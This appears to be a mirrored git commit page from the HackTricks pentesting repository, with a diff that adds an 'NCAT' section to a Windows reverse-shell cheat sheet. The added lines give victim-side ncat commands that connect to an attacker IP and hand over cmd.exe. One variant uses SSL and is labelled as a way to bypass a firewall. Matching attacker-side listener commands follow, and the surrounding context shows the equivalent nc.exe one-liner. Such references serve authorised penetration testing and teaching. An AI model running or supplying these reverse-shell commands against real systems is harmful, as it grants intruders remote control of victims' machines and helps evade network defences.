mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-21 20:23:18 +00:00
add Ncat
This commit is contained in:
parent
0e57ade27e
commit
f16e8b7f2f
1 changed files with 13 additions and 0 deletions
|
@ -33,6 +33,19 @@ Obviously, **there aren't SUID files or sudo privileges in Windows**, but it's u
|
|||
```bash
|
||||
nc.exe -e cmd.exe <Attacker_IP> <PORT>
|
||||
```
|
||||
## NCAT
|
||||
victim
|
||||
```
|
||||
ncat.exe <Attacker_IP> <PORT> -e cmd.exe
|
||||
#Encryption to bypass firewall
|
||||
ncat.exe <Attacker_IP> <PORT eg.443> --ssl -e cmd.exe
|
||||
```
|
||||
attacker
|
||||
```
|
||||
ncat -l <PORT 443>
|
||||
#Encryption to bypass firewall
|
||||
ncat -l <PORT eg.443> --ssl
|
||||
```
|
||||
|
||||
## SBD
|
||||
|
||||
|
|
Loading…
Reference in a new issue